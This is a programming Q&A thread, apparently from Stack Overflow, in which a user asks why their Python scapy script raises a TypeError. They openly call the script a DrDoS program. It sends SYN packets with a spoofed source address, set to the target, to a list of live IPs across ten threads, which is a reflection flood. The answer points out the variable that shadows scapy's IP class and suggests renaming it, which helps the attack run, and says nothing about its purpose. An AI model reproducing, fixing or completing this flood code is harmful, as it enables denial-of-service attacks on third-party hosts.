# Python TypeError: 'str' object is not callable

Tags: python

I am trying to make a DrDoS program in python but I keep getting

> TypeError: 'str' object is not callable

here is my code

```
import os
import sys
import threading
from scapy.all import *
from time import sleep

if os.getgid()!=0:
print "Cannot send SYN packets without root, exiting..."
exit(1)

list=raw_input("List of live IPs: ")
target=raw_input("Target: ")
port=int(raw_input("Port: "))

print "Flooding, press ^Z to stop."

class SYNFlood(threading.Thread):
 def run(self):
    c=0
    with open(list, "r") as f:
        IP = f.readline()
        a=IP(dst=IP, src=target, ttl=255)/TCP(flags="S", sport=RandShort(), dport=port)
        send(a, verbose=0)
        sys.stdout.write('.')
        c=c+1
    print "Done, sent " + str(c) + " packets."
    exit(0)

for x in range(10):
t = SYNFlood()
t.start()
```

I did do some research and found this is from a variable that has the name 'str' I  have not found this. Interesting.

Answer (score 7):

These lines here:

```
IP = f.readline()
a=IP(dst=IP, src=target, ttl=255)/TCP(flags="S", sport=RandShort(), dport=port)
```

contain the problem, `IP` is a string and you are trying to call it like a function.

```
IP(dst=IP, src=target, ttl=255)
```

perhaps you should pick a different variable name so as to not interfere with other namespaces.

Also, this line:

```
list=raw_input("List of live IPs: ")
```

prevents you from using the `list` builtin function, please reconsider this name as well.

Comment: @D4zk1tty, you should probably mark the question as solved then.